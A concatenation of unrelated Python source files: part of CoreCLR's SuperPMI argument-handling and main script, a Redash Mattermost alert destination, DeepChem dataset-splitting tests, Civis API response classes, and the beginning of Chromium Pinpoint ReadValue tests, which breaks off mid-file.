modify_arg=lambda arg: "INFO" if arg is None else arg.upper())
coreclr_args.verify(args,
"log_file",
lambda unused: True,
"Unable to set log_file.")
def setup_spmi_location_arg(spmi_location):
return os.path.abspath(os.path.join(coreclr_args.artifacts_location, "spmi")) if spmi_location is None else spmi_location
coreclr_args.verify(args,
"spmi_location",
lambda unused: True,
"Unable to set spmi_location",
modify_arg=setup_spmi_location_arg)
# Finish setting up logging.
# The spmi_location is the root directory where we put the log file.
# Log everything to the log file and only the specified verbosity to the console logger.
# Now, change the stream handler output level.
stream_handler.setLevel(coreclr_args.log_level)
log_file = None
if coreclr_args.log_file is None:
if hasattr(coreclr_args, "spmi_location"):
log_file = os.path.join(coreclr_args.spmi_location, "superpmi.log")
if not os.path.isdir(coreclr_args.spmi_location):
os.makedirs(coreclr_args.spmi_location)
else:
log_file = coreclr_args.log_file
log_dir = os.path.dirname(log_file)
if not os.path.isdir(log_dir):
print("Creating log directory {} for log file {}".format(log_dir, log_file))
os.makedirs(log_dir)
if log_file is not None:
# If the log file exists, we could use the default behavior and simply append.
# For now, though, just delete it and warn. We can change behavior later if there's user feedback on it.
if os.path.isfile(log_file):
logging.critical("Warning: deleting existing log file %s", log_file)
os.remove(log_file)
file_handler = logging.FileHandler(log_file)
file_handler.setLevel(logging.DEBUG)
logger.addHandler(file_handler)
logging.critical("================ Logging to %s", log_file)
# Finish verifying the arguments
def setup_jit_ee_version_arg(jit_ee_version):
if jit_ee_version is not None:
# The user passed a specific jit_ee_version on the command-line, so use that
return jit_ee_version
return determine_jit_ee_version(coreclr_args)
def setup_jit_path_arg(jit_path):
if jit_path is not None:
return os.path.abspath(jit_path)
return find_tool(coreclr_args, determine_jit_name(coreclr_args), search_path=False) # It doesn't make sense to search PATH for the JIT dll.
def verify_jit_ee_version_arg():
coreclr_args.verify(args,
"jit_ee_version",
lambda unused: True,
"Invalid JIT-EE Version.",
modify_arg=setup_jit_ee_version_arg)
def verify_target_args():
coreclr_args.verify(args,
"target_os",
lambda target_os: check_target_os(coreclr_args, target_os),
lambda target_os: "Unknown target_os {}\nSupported OS: {}".format(target_os, (", ".join(coreclr_args.valid_host_os))),
modify_arg=lambda target_os: target_os if target_os is not None else coreclr_args.host_os) # Default to `host_os`
coreclr_args.verify(args,
"target_arch",
lambda target_arch: check_target_arch(coreclr_args, target_arch),
lambda target_arch: "Unknown target_arch {}\nSupported architectures: {}".format(target_arch, (", ".join(coreclr_args.valid_arches))),
modify_arg=lambda target_arch: target_arch if target_arch is not None else coreclr_args.arch) # Default to `arch`
coreclr_args.verify(args,
"mch_arch",
lambda mch_arch: check_mch_arch(coreclr_args, mch_arch),
lambda mch_arch: "Unknown mch_arch {}\nSupported architectures: {}".format(mch_arch, (", ".join(coreclr_args.valid_arches))),
modify_arg=lambda mch_arch: mch_arch if mch_arch is not None else coreclr_args.target_arch) # Default to `target_arch`
def verify_superpmi_common_args():
coreclr_args.verify(args,
"break_on_assert",
lambda unused: True,
"Unable to set break_on_assert")
coreclr_args.verify(args,
"break_on_error",
lambda unused: True,
"Unable to set break_on_error")
coreclr_args.verify(args,
"skip_cleanup",
lambda unused: True,
"Unable to set skip_cleanup")
coreclr_args.verify(args,
"sequential",
lambda unused: True,
"Unable to set sequential.")
coreclr_args.verify(args,
"spmi_log_file",
lambda unused: True,
"Unable to set spmi_log_file.")
if coreclr_args.spmi_log_file is not None and not coreclr_args.sequential:
print("-spmi_log_file requires --sequential")
sys.exit(1)
def verify_replay_common_args():
verify_jit_ee_version_arg()
coreclr_args.verify(args,
"force_download",
lambda unused: True,
"Unable to set force_download")
coreclr_args.verify(args,
"jit_name",
lambda unused: True,
"Unable to set jit_name.")
coreclr_args.verify(args,
"altjit", # Must be set before `jit_path` (determine_jit_name() depends on it)
lambda unused: True,
"Unable to set altjit.")
coreclr_args.verify(args,
"filter",
lambda unused: True,
"Unable to set filter.")
coreclr_args.verify(args,
"mch_files",
lambda unused: True,
"Unable to set mch_files")
if coreclr_args.mode == "collect":
verify_target_args()
verify_superpmi_common_args()
coreclr_args.verify(args,
"jit_name", # The replay code checks this, so make sure it's set
lambda unused: True,
"Unable to set jit_name.")
coreclr_args.verify(args,
"altjit", # The replay code checks this, so make sure it's set
lambda unused: True,
"Unable to set altjit.")
coreclr_args.verify(args,
"collection_command",
lambda unused: True,
"Unable to set collection_command.")
coreclr_args.verify(args,
"collection_args",
lambda unused: True,
"Unable to set collection_args",
modify_arg=lambda collection_args: collection_args.split(" ") if collection_args is not None else [])
coreclr_args.verify(args,
"pmi",
lambda unused: True,
"Unable to set pmi")
coreclr_args.verify(args,
"crossgen",
lambda unused: True,
"Unable to set crossgen")
coreclr_args.verify(args,
"crossgen2",
lambda unused: True,
"Unable to set crossgen2")
coreclr_args.verify(args,
"assemblies",
lambda unused: True,
"Unable to set assemblies",
modify_arg=lambda items: [item for item in items if os.path.isdir(item) or os.path.isfile(item)])
coreclr_args.verify(args,
"exclude",
lambda unused: True,
"Unable to set exclude")
coreclr_args.verify(args,
"pmi_location",
lambda unused: True,
"Unable to set pmi_location")
coreclr_args.verify(args,
"output_mch_path",
lambda output_mch_path: output_mch_path is None or (not os.path.isdir(os.path.abspath(output_mch_path)) and not os.path.isfile(os.path.abspath(output_mch_path))),
"Invalid output_mch_path \"{}\"; is it an existing directory or file?".format,
modify_arg=lambda output_mch_path: None if output_mch_path is None else os.path.abspath(output_mch_path))
coreclr_args.verify(args,
"merge_mch_files",
lambda unused: True,
"Unable to set merge_mch_files.")
coreclr_args.verify(args,
"mch_files",
lambda items: items is None or len(items) > 0,
"Unable to set mch_files.")
coreclr_args.verify(args,
"skip_collect_mc_files",
lambda unused: True,
"Unable to set skip_collect_mc_files")
coreclr_args.verify(args,
"temp_dir",
lambda unused: True,
"Unable to set temp_dir.")
coreclr_args.verify(args,
"skip_collection_step",
lambda unused: True,
"Unable to set skip_collection_step.")
coreclr_args.verify(args,
"skip_merge_step",
lambda unused: True,
"Unable to set skip_merge_step.")
coreclr_args.verify(args,
"skip_clean_and_verify_step",
lambda unused: True,
"Unable to set skip_clean_and_verify_step.")
coreclr_args.verify(args,
"use_zapdisable",
lambda unused: True,
"Unable to set use_zapdisable")
if (args.collection_command is None) and (args.pmi is False) and (args.crossgen is False) and (args.crossgen2 is False):
print("Either a collection command or `--pmi` or `--crossgen` or `--crossgen2` must be specified")
sys.exit(1)
if (args.collection_command is not None) and (len(args.assemblies) > 0):
print("Don't specify `-assemblies` if a collection command is given")
sys.exit(1)
if (args.collection_command is not None) and (len(args.exclude) > 0):
print("Don't specify `-exclude` if a collection command is given")
sys.exit(1)
if ((args.pmi is True) or (args.crossgen is True) or (args.crossgen2 is True)) and (len(args.assemblies) == 0):
print("Specify `-assemblies` if `--pmi` or `--crossgen` or `--crossgen2` is given")
sys.exit(1)
if args.collection_command is None and args.merge_mch_files is not True:
assert args.collection_args is None
assert (args.pmi is True) or (args.crossgen is True) or (args.crossgen2 is True)
assert len(args.assemblies) > 0
if coreclr_args.merge_mch_files:
assert len(coreclr_args.mch_files) > 0
coreclr_args.skip_collection_step = True
if coreclr_args.crossgen2:
# Can we find crossgen2?
crossgen2_tool_name = "crossgen2.dll"
crossgen2_tool_path = os.path.abspath(os.path.join(coreclr_args.core_root, "crossgen2", crossgen2_tool_name))
if not os.path.exists(crossgen2_tool_path):
print("`--crossgen2` is specified, but couldn't find " + crossgen2_tool_path + ". (Is it built?)")
sys.exit(1)
# Which dotnet will we use to run it?
dotnet_script_name = "dotnet.cmd" if platform.system() == "Windows" else "dotnet.sh"
dotnet_tool_path = os.path.abspath(os.path.join(coreclr_args.runtime_repo_location, dotnet_script_name))
if not os.path.exists(dotnet_tool_path):
dotnet_tool_name = determine_dotnet_tool_name(coreclr_args)
dotnet_tool_path = find_tool(coreclr_args, dotnet_tool_name, search_core_root=False, search_product_location=False, search_path=True, throw_on_not_found=False) # Only search path
coreclr_args.crossgen2_tool_path = crossgen2_tool_path
coreclr_args.dotnet_tool_path = dotnet_tool_path
logging.debug("Using crossgen2 tool %s", coreclr_args.crossgen2_tool_path)
if coreclr_args.dotnet_tool_path is not None:
logging.debug("Using dotnet tool %s", coreclr_args.dotnet_tool_path)
if coreclr_args.temp_dir is not None:
coreclr_args.temp_dir = os.path.abspath(coreclr_args.temp_dir)
logging.debug("Using temp_dir %s", coreclr_args.temp_dir)
if coreclr_args.collection_command is not None:
if os.path.isfile(coreclr_args.collection_command):
coreclr_args.collection_command = os.path.abspath(coreclr_args.collection_command)
else:
# Look on path and in Core_Root. Searching Core_Root is useful so you can just specify "corerun.exe" as the collection command in it can be found.
collection_tool_path = find_tool(coreclr_args, coreclr_args.collection_command, search_core_root=True, search_product_location=False, search_path=True, throw_on_not_found=False)
if collection_tool_path is None:
print("Couldn't find collection command \"{}\"".format(coreclr_args.collection_command))
sys.exit(1)
coreclr_args.collection_command = collection_tool_path
logging.info("Using collection command from PATH: \"%s\"", coreclr_args.collection_command)
elif coreclr_args.mode == "replay":
verify_target_args()
verify_superpmi_common_args()
verify_replay_common_args()
coreclr_args.verify(args,
"jit_path",
os.path.isfile,
"Error: JIT not found at jit_path {}".format,
modify_arg=setup_jit_path_arg)
jit_in_product_location = False
if coreclr_args.product_location.lower() in coreclr_args.jit_path.lower():
jit_in_product_location = True
determined_arch = None
determined_build_type = None
if jit_in_product_location:
# Get os/arch/flavor directory, e.g. split "F:\gh\runtime\artifacts\bin\coreclr\windows.x64.Checked" with "F:\gh\runtime\artifacts\bin\coreclr"
# yielding
# [0]: ""
# [1]: "\windows.x64.Checked"
standard_location_split = os.path.dirname(coreclr_args.jit_path).split(os.path.dirname(coreclr_args.product_location))
assert coreclr_args.host_os in standard_location_split[1]
# Get arch/flavor. Remove leading slash.
specialized_path = standard_location_split[1].split(os.path.sep)[1]
# Split components: "windows.x64.Checked" into:
# [0]: "windows"
# [1]: "x64"
# [2]: "Checked"
determined_split = specialized_path.split(".")
determined_arch = determined_split[1]
determined_build_type = determined_split[2]
# Make a more intelligent decision about the arch and build type
# based on the path of the jit passed
if jit_in_product_location and coreclr_args.build_type not in coreclr_args.jit_path:
coreclr_args.verify(determined_arch.lower(),
"arch",
lambda unused: True,
"Unable to set arch")
coreclr_args.verify(determined_build_type,
"build_type",
coreclr_args.check_build_type,
"Invalid build_type")
elif coreclr_args.mode == "asmdiffs":
verify_target_args()
verify_superpmi_common_args()
verify_replay_common_args()
coreclr_args.verify(args,
"base_jit_path",
lambda unused: True,
"Unable to set base_jit_path")
coreclr_args.verify(args,
"diff_jit_path",
os.path.isfile,
"Error: JIT not found at diff_jit_path {}".format,
modify_arg=setup_jit_path_arg)
coreclr_args.verify(args,
"git_hash",
lambda unused: True,
"Unable to set git_hash")
coreclr_args.verify(args,
"base_git_hash",
lambda unused: True,
"Unable to set base_git_hash")
coreclr_args.verify(args,
"temp_dir",
lambda unused: True,
"Unable to set temp_dir.")
coreclr_args.verify(args,
"gcinfo",
lambda unused: True,
"Unable to set gcinfo.")
coreclr_args.verify(args,
"diff_jit_dump",
lambda unused: True,
"Unable to set diff_jit_dump.")
process_base_jit_path_arg(coreclr_args)
jit_in_product_location = False
if coreclr_args.product_location.lower() in coreclr_args.base_jit_path.lower():
jit_in_product_location = True
determined_arch = None
determined_build_type = None
if jit_in_product_location:
# Get os/arch/flavor directory, e.g. split "F:\gh\runtime\artifacts\bin\coreclr\windows.x64.Checked" with "F:\gh\runtime\artifacts\bin\coreclr"
# yielding
# [0]: ""
# [1]: "\windows.x64.Checked"
standard_location_split = os.path.dirname(coreclr_args.base_jit_path).split(os.path.dirname(coreclr_args.product_location))
assert coreclr_args.host_os in standard_location_split[1]
# Get arch/flavor. Remove leading slash.
specialized_path = standard_location_split[1].split(os.path.sep)[1]
# Split components: "windows.x64.Checked" into:
# [0]: "windows"
# [1]: "x64"
# [2]: "Checked"
determined_split = specialized_path.split(".")
determined_arch = determined_split[1]
determined_build_type = determined_split[2]
# Make a more intelligent decision about the arch and build type
# based on the path of the jit passed
if jit_in_product_location and coreclr_args.build_type not in coreclr_args.base_jit_path:
coreclr_args.verify(determined_build_type,
"build_type",
coreclr_args.check_build_type,
"Invalid build_type")
if jit_in_product_location and coreclr_args.arch not in coreclr_args.base_jit_path:
coreclr_args.verify(determined_arch.lower(),
"arch",
lambda unused: True,
"Unable to set arch")
coreclr_args.verify(determine_coredis_tools(coreclr_args),
"coredistools_location",
os.path.isfile,
"Unable to find coredistools.")
if coreclr_args.temp_dir is not None:
coreclr_args.temp_dir = os.path.abspath(coreclr_args.temp_dir)
logging.debug("Using temp_dir %s", coreclr_args.temp_dir)
elif coreclr_args.mode == "upload":
verify_target_args()
verify_jit_ee_version_arg()
coreclr_args.verify(args,
"az_storage_key",
lambda item: item is not None,
"Specify az_storage_key or set environment variable CLRJIT_AZ_KEY to the key to use.",
modify_arg=lambda arg: os.environ["CLRJIT_AZ_KEY"] if arg is None and "CLRJIT_AZ_KEY" in os.environ else arg)
coreclr_args.verify(args,
"jit_location",
lambda unused: True,
"Unable to set jit_location.")
coreclr_args.verify(args,
"mch_files",
lambda unused: True,
"Unable to set mch_files")
elif coreclr_args.mode == "download":
verify_target_args()
verify_jit_ee_version_arg()
coreclr_args.verify(args,
"force_download",
lambda unused: True,
"Unable to set force_download")
coreclr_args.verify(args,
"filter",
lambda unused: True,
"Unable to set filter.")
coreclr_args.verify(args,
"mch_files",
lambda unused: True,
"Unable to set mch_files")
elif coreclr_args.mode == "list-collections":
verify_target_args()
verify_jit_ee_version_arg()
coreclr_args.verify(args,
"all",
lambda unused: True,
"Unable to set all")
coreclr_args.verify(args,
"local",
lambda unused: True,
"Unable to set local")
elif coreclr_args.mode == "merge-mch":
coreclr_args.verify(args,
"output_mch_path",
lambda output_mch_path: not os.path.isdir(os.path.abspath(output_mch_path)) and not os.path.isfile(os.path.abspath(output_mch_path)),
"Invalid output_mch_path \"{}\"; is it an existing directory or file?".format,
modify_arg=lambda output_mch_path: os.path.abspath(output_mch_path))
coreclr_args.verify(args,
"pattern",
lambda unused: True,
"Unable to set pattern")
return coreclr_args
################################################################################
# main
################################################################################
def main(args):
""" Main method
"""
# await/async requires python >= 3.7
if sys.version_info.major < 3 and sys.version_info.minor < 7:
print("Error, language features require the latest python version.")
print("Please install python 3.7 or greater")
return 1
# Force tiered compilation off. It will affect both collection and replay.
# REVIEW: Is this true for replay? We specifically set this when doing collections. Can we remove this line?
# Or move it more close to the location that requires it, and output to the console that we're setting this?
os.environ["COMPlus_TieredCompilation"] = "0"
# Parse the arguments.
coreclr_args = setup_args(args)
#
# Run the selected command
#
success = True
if coreclr_args.mode == "collect":
# Start a new SuperPMI Collection.
begin_time = datetime.datetime.now()
logging.info("SuperPMI collect")
logging.debug("------------------------------------------------------------")
logging.debug("Start time: %s", begin_time.strftime("%H:%M:%S"))
collection = SuperPMICollect(coreclr_args)
success = collection.collect()
if success and coreclr_args.output_mch_path is not None:
logging.info("Generated MCH file: %s", coreclr_args.output_mch_path)
end_time = datetime.datetime.now()
elapsed_time = end_time - begin_time
logging.debug("Finish time: %s", end_time.strftime("%H:%M:%S"))
logging.debug("Elapsed time: %s", elapsed_time)
elif coreclr_args.mode == "replay":
# Start a new SuperPMI Replay
process_mch_files_arg(coreclr_args)
mch_files = get_mch_files_for_replay(coreclr_args)
if mch_files is None:
return 1
begin_time = datetime.datetime.now()
logging.info("SuperPMI replay")
logging.debug("------------------------------------------------------------")
logging.debug("Start time: %s", begin_time.strftime("%H:%M:%S"))
jit_path = coreclr_args.jit_path
logging.info("JIT Path: %s", jit_path)
logging.info("Using MCH files:")
for mch_file in mch_files:
logging.info(" %s", mch_file)
replay = SuperPMIReplay(coreclr_args, mch_files, jit_path)
success = replay.replay()
end_time = datetime.datetime.now()
elapsed_time = end_time - begin_time
logging.debug("Finish time: %s", end_time.strftime("%H:%M:%S"))
logging.debug("Elapsed time: %s", elapsed_time)
elif coreclr_args.mode == "asmdiffs":
# Start a new SuperPMI Replay with AsmDiffs
process_mch_files_arg(coreclr_args)
mch_files = get_mch_files_for_replay(coreclr_args)
if mch_files is None:
return 1
begin_time = datetime.datetime.now()
logging.info("SuperPMI ASM diffs")
logging.debug("------------------------------------------------------------")
logging.debug("Start time: %s", begin_time.strftime("%H:%M:%S"))
base_jit_path = coreclr_args.base_jit_path
diff_jit_path = coreclr_args.diff_jit_path
logging.info("Base JIT Path: %s", base_jit_path)
logging.info("Diff JIT Path: %s", diff_jit_path)
logging.info("Using MCH files:")
for mch_file in mch_files:
logging.info(" %s", mch_file)
asm_diffs = SuperPMIReplayAsmDiffs(coreclr_args, mch_files, base_jit_path, diff_jit_path)
success = asm_diffs.replay_with_asm_diffs()
end_time = datetime.datetime.now()
elapsed_time = end_time - begin_time
logging.debug("Finish time: %s", end_time.strftime("%H:%M:%S"))
logging.debug("Elapsed time: %s", elapsed_time)
elif coreclr_args.mode == "upload":
begin_time = datetime.datetime.now()
logging.info("SuperPMI upload")
logging.debug("------------------------------------------------------------")
logging.debug("Start time: %s", begin_time.strftime("%H:%M:%S"))
upload_mch(coreclr_args)
end_time = datetime.datetime.now()
elapsed_time = end_time - begin_time
logging.debug("Finish time: %s", end_time.strftime("%H:%M:%S"))
logging.debug("Elapsed time: %s", elapsed_time)
elif coreclr_args.mode == "download":
begin_time = datetime.datetime.now()
logging.info("SuperPMI download")
logging.debug("------------------------------------------------------------")
logging.debug("Start time: %s", begin_time.strftime("%H:%M:%S"))
# Processing the arg does the download and caching
process_mch_files_arg(coreclr_args)
end_time = datetime.datetime.now()
elapsed_time = end_time - begin_time
logging.debug("Finish time: %s", end_time.strftime("%H:%M:%S"))
logging.debug("Elapsed time: %s", elapsed_time)
elif coreclr_args.mode == "list-collections":
if coreclr_args.local:
list_collections_local_command(coreclr_args)
else:
list_collections_command(coreclr_args)
elif coreclr_args.mode == "merge-mch":
success = merge_mch(coreclr_args)
else:
raise NotImplementedError(coreclr_args.mode)
return 0 if success else 1
################################################################################
# __main__
################################################################################
if __name__ == "__main__":
args = parser.parse_args()
sys.exit(main(args))
|
import logging
import requests
from redash.destinations import *
from redash.utils import json_dumps
class Mattermost(BaseDestination):
@classmethod
def configuration_schema(cls):
return {
"type": "object",
"properties": {
"url": {"type": "string", "title": "Mattermost Webhook URL"},
"username": {"type": "string", "title": "Username"},
"icon_url": {"type": "string", "title": "Icon (URL)"},
"channel": {"type": "string", "title": "Channel"},
},
}
@classmethod
def icon(cls):
return "fa-bolt"
def notify(self, alert, query, user, new_state, app, host, metadata, options):
if alert.custom_subject:
text = alert.custom_subject
elif new_state == "triggered":
text = "#### " + alert.name + " just triggered"
else:
text = "#### " + alert.name + " went back to normal"
payload = {"text": text}
if alert.custom_body:
payload["attachments"] = [
{"fields": [{"title": "Description", "value": alert.custom_body}]}
]
if options.get("username"):
payload["username"] = options.get("username")
if options.get("icon_url"):
payload["icon_url"] = options.get("icon_url")
if options.get("channel"):
payload["channel"] = options.get("channel")
try:
resp = requests.post(
options.get("url"), data=json_dumps(payload), timeout=5.0
)
logging.warning(resp.text)
if resp.status_code != 200:
logging.error(
"Mattermost webhook send ERROR. status_code => {status}".format(
status=resp.status_code
)
)
except Exception:
logging.exception("Mattermost webhook send ERROR.")
register(Mattermost)
|
"""
Tests for FeaturizedSamples class
"""
import os
import tempfile
import shutil
import deepchem as dc
def test_unlabelled():
current_dir = os.path.dirname(os.path.abspath(__file__))
input_file = os.path.join(current_dir, "../../data/tests/no_labels.csv")
featurizer = dc.feat.CircularFingerprint(size=1024)
loader = dc.data.CSVLoader(
tasks=[], feature_field="smiles", featurizer=featurizer)
dataset = loader.create_dataset(input_file)
assert len(dataset.X)
def test_scaffold_test_train_valid_test_split():
"""Test of singletask RF ECFP regression API."""
current_dir = os.path.dirname(os.path.abspath(__file__))
tasks = ["log-solubility"]
input_file = os.path.join(current_dir,
"../../models/tests/assets/example.csv")
featurizer = dc.feat.CircularFingerprint(size=1024)
input_file = os.path.join(current_dir, input_file)
loader = dc.data.CSVLoader(
tasks=tasks, feature_field="smiles", featurizer=featurizer)
dataset = loader.create_dataset(input_file)
# Splits featurized samples into train/test
splitter = dc.splits.ScaffoldSplitter()
train_dataset, valid_dataset, test_dataset = splitter.train_valid_test_split(
dataset)
assert len(train_dataset) == 8
assert len(valid_dataset) == 1
assert len(test_dataset) == 1
def test_scaffold_test_train_test_split():
"""Test of singletask RF ECFP regression API."""
current_dir = os.path.dirname(os.path.abspath(__file__))
tasks = ["log-solubility"]
input_file = os.path.join(current_dir,
"../../models/tests/assets/example.csv")
featurizer = dc.feat.CircularFingerprint(size=1024)
input_file = os.path.join(current_dir, input_file)
loader = dc.data.CSVLoader(
tasks=tasks, feature_field="smiles", featurizer=featurizer)
dataset = loader.create_dataset(input_file)
# Splits featurized samples into train/test
splitter = dc.splits.ScaffoldSplitter()
train_dataset, test_dataset = splitter.train_test_split(dataset)
assert len(train_dataset) == 8
assert len(test_dataset) == 2
def test_random_test_train_valid_test_split():
"""Test of singletask RF ECFP regression API."""
current_dir = os.path.dirname(os.path.abspath(__file__))
tasks = ["log-solubility"]
input_file = os.path.join(current_dir,
"../../models/tests/assets/example.csv")
featurizer = dc.feat.CircularFingerprint(size=1024)
input_file = os.path.join(current_dir, input_file)
loader = dc.data.CSVLoader(
tasks=tasks, feature_field="smiles", featurizer=featurizer)
dataset = loader.create_dataset(input_file)
# Splits featurized samples into train/test
splitter = dc.splits.RandomSplitter()
train_dataset, valid_dataset, test_dataset = splitter.train_valid_test_split(
dataset)
assert len(train_dataset) == 8
assert len(valid_dataset) == 1
assert len(test_dataset) == 1
def test_random_test_train_test_split():
"""Test of singletask RF ECFP regression API."""
current_dir = os.path.dirname(os.path.abspath(__file__))
tasks = ["log-solubility"]
input_file = os.path.join(current_dir,
"../../models/tests/assets/example.csv")
featurizer = dc.feat.CircularFingerprint(size=1024)
loader = dc.data.CSVLoader(
tasks=tasks, feature_field="smiles", featurizer=featurizer)
dataset = loader.create_dataset(input_file)
# Splits featurized samples into train/test
splitter = dc.splits.RandomSplitter()
train_dataset, test_dataset = splitter.train_test_split(dataset)
assert len(train_dataset) == 8
assert len(test_dataset) == 2
def test_log_solubility_dataset():
"""Test of loading for simple log-solubility dataset."""
current_dir = os.path.dirname(os.path.realpath(__file__))
input_file = "../../models/tests/assets/example.csv"
input_file = os.path.join(current_dir, input_file)
tasks = ["log-solubility"]
loader = dc.data.CSVLoader(
tasks=tasks,
feature_field="smiles",
featurizer=dc.feat.CircularFingerprint(size=1024))
dataset = loader.create_dataset(input_file)
assert len(dataset) == 10
def test_dataset_move():
"""Test that dataset can be moved and reloaded."""
current_dir = os.path.dirname(os.path.abspath(__file__))
base_dir = tempfile.mkdtemp()
data_dir = os.path.join(base_dir, "data")
moved_data_dir = os.path.join(base_dir, "moved_data")
dataset_file = os.path.join(current_dir,
"../../models/tests/assets/example.csv")
featurizer = dc.feat.CircularFingerprint(size=1024)
tasks = ["log-solubility"]
loader = dc.data.CSVLoader(
tasks=tasks, feature_field="smiles", featurizer=featurizer)
featurized_dataset = loader.create_dataset(dataset_file, data_dir)
n_dataset = len(featurized_dataset)
# Now perform move
shutil.move(data_dir, moved_data_dir)
moved_featurized_dataset = dc.data.DiskDataset(moved_data_dir)
assert len(moved_featurized_dataset) == n_dataset
|
from __future__ import absolute_import
import requests
from civis._utils import camel_to_snake
class CivisClientError(Exception):
def __init__(self, message, response):
self.status_code = response.status_code
self.error_message = message
def __str__(self):
return self.error_message
def _response_to_json(response):
"""Parse a raw response to a dict.
Parameters
----------
response: requests.Response
A raw response returned by an API call.
Returns
-------
dict | None
The data in the response body or None if the response has no
content.
Raises
------
CivisClientError
If the data in the raw response cannot be parsed.
"""
if response.content == b'':
return None
else:
try:
return response.json()
except ValueError:
raise CivisClientError("Unable to parse JSON from response",
response)
def convert_response_data_type(response, headers=None, return_type='snake'):
"""Convert a raw response into a given type.
Parameters
----------
response : list, dict, or `requests.Response`
Convert this object into a different response object.
headers : dict, optional
If given and the return type supports it, attach these headers to the
converted response. If `response` is a `requests.Response`, the headers
will be inferred from it.
return_type : string, {'snake', 'raw', 'pandas'}
Convert the response to this type. See documentation on
`civis.APIClient` for details of the return types.
Returns
-------
list, dict, `civis.response.Response`, `requests.Response`,
`pandas.DataFrame`, or `pandas.Series`
Depending on the value of `return_type`.
"""
assert return_type in ['snake', 'raw', 'pandas'], 'Invalid return type'
if return_type == 'raw':
return response
if isinstance(response, requests.Response):
headers = response.headers
data = _response_to_json(response)
else:
data = response
if return_type == 'pandas':
import pandas as pd
if isinstance(data, list):
return pd.DataFrame.from_records(data)
# there may be nested objects or arrays in this series
return pd.Series(data)
elif return_type == 'snake':
if isinstance(data, list):
return [Response(d, headers=headers) for d in data]
return Response(data, headers=headers)
class Response(dict):
"""Custom Civis response object.
Attributes
----------
json_data : dict | None
This is `json_data` as it is originally returned to the user without
the key names being changed. See Notes. None is used if the original
response returned a 204 No Content response.
headers : dict
This is the header for the API call without changing the key names.
calls_remaining : int
Number of API calls remaining before rate limit is reached.
rate_limit : int
Total number of calls per API rate limit period.
Notes
-----
The main features of this class are that it maps camelCase to snake_case
at the top level of the json object and attaches keys as attributes.
Nested object keys are not changed.
"""
def __init__(self, json_data, snake_case=True, headers=None):
self.json_data = json_data
if headers is not None:
# this circumvents recursive calls
self.headers = headers
self.calls_remaining = headers.get('X-RateLimit-Remaining')
self.rate_limit = headers.get('X-RateLimit-Limit')
if json_data is not None:
for key, v in json_data.items():
if snake_case:
key = camel_to_snake(key)
if isinstance(v, dict):
val = Response(v, False)
elif isinstance(v, list):
val = [Response(o) if isinstance(o, dict) else o
for o in v]
else:
val = v
self.update({key: val})
self.__dict__.update({key: val})
class PaginatedResponse:
"""A response object which is an iterator
Parameters
----------
path : str
Make GET requests to this path.
initial_params : dict
Query params that should be passed along with each request. Note that
if `initial_params` contains the keys `page_num` or `limit`, they will
be ignored. The given dict is not modified.
endpoint : `civis.base.Endpoint`
An endpoint used to make API requests.
Notes
-----
This response is returned automatically by endpoints which support
pagination when the `iterator` kwarg is specified.
Examples
--------
>>> client = civis.APIClient()
>>> queries = client.queries.list(iterator=True)
>>> for query in queries:
... print(query['id'])
"""
def __init__(self, path, initial_params, endpoint):
self._path = path
self._params = initial_params.copy()
self._endpoint = endpoint
# We are paginating through all items, so start at the beginning and
# let the API determine the limit.
self._params['page_num'] = 1
self._params.pop('limit', None)
self._iter = None
def __iter__(self):
return self
def _get_iter(self):
while True:
response = self._endpoint._make_request('GET',
self._path,
self._params)
page_data = _response_to_json(response)
if len(page_data) == 0:
return
for data in page_data:
converted_data = convert_response_data_type(
data,
headers=response.headers,
return_type=self._endpoint._return_type
)
yield converted_data
self._params['page_num'] += 1
def __next__(self):
if self._iter is None:
self._iter = self._get_iter()
return next(self._iter)
next = __next__ # Python 2 compatibility
|
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import json
import logging
import mock
import sys
import unittest
from dashboard.pinpoint.models.quest import read_value
from tracing.proto import histogram_proto
from tracing.value import histogram_set
from tracing.value import histogram as histogram_module
from tracing.value.diagnostics import generic_set
from tracing.value.diagnostics import reserved_infos
_BASE_ARGUMENTS_HISTOGRAMS = {'benchmark': 'speedometer'}
_BASE_ARGUMENTS_GRAPH_JSON = {
'benchmark': 'base_perftests',
'chart': 'chart_name',
'trace': 'trace_name',
}
class ReadValueQuestTest(unittest.TestCase):
def setUp(self):
# Intercept the logging messages, so that we can see them when we have test
# output in failures.
self.logger = logging.getLogger()
self.logger.level = logging.DEBUG
self.stream_handler = logging.StreamHandler(sys.stdout)
self.logger.addHandler(self.stream_handler)
self.addCleanup(self.logger.removeHandler, self.stream_handler)
super(ReadValueQuestTest, self).setUp()
def testMinimumArguments(self):
quest = read_value.ReadValue.FromDict(_BASE_ARGUMENTS_HISTOGRAMS)
expected = read_value.ReadValue(
results_filename='speedometer/perf_results.json')
self.assertEqual(quest, expected)
def testAllArguments(self):
arguments = dict(_BASE_ARGUMENTS_HISTOGRAMS)
arguments['chart'] = 'timeToFirst'
arguments['grouping_label'] = 'pcv1-cold'
arguments['trace'] = 'trace_name'
arguments['statistic'] = 'avg'
quest = read_value.ReadValue.FromDict(arguments)
expected = read_value.ReadValue(
results_filename='speedometer/perf_results.json',
metric='timeToFirst',
grouping_label='pcv1-cold',
trace_or_story='trace_name',
statistic='avg',
chart='timeToFirst')
self.assertEqual(quest, expected)
def testArgumentsWithStoryInsteadOfTrace(self):
arguments = dict(_BASE_ARGUMENTS_HISTOGRAMS)
arguments['chart'] = 'timeToFirst'
arguments['grouping_label'] = 'pcv1-cold'
arguments['story'] = 'trace_name'
arguments['statistic'] = 'avg'
quest = read_value.ReadValue.FromDict(arguments)
expected = read_value.ReadValue(
results_filename='speedometer/perf_results.json',
metric='timeToFirst',
grouping_label='pcv1-cold',
trace_or_story='trace_name',
statistic='avg',
chart='timeToFirst')
self.assertEqual(quest, expected)
def testArgumentsWithNoChart(self):
arguments = dict(_BASE_ARGUMENTS_HISTOGRAMS)
arguments['story'] = 'trace_name'
quest = read_value.ReadValue.FromDict(arguments)
expected = read_value.ReadValue(
results_filename='speedometer/perf_results.json',
metric=None,
grouping_label=None,
trace_or_story='trace_name',
statistic=None)
self.assertEqual(quest, expected)
def testWindows(self):
arguments = dict(_BASE_ARGUMENTS_HISTOGRAMS)
arguments['dimensions'] = [{'key': 'os', 'value': 'Windows-10'}]
quest = read_value.ReadValue.FromDict(arguments)
expected = read_value.ReadValue(
results_filename='speedometer\\perf_results.json')
self.assertEqual(quest, expected)
def testGraphJsonMissingChart(self):
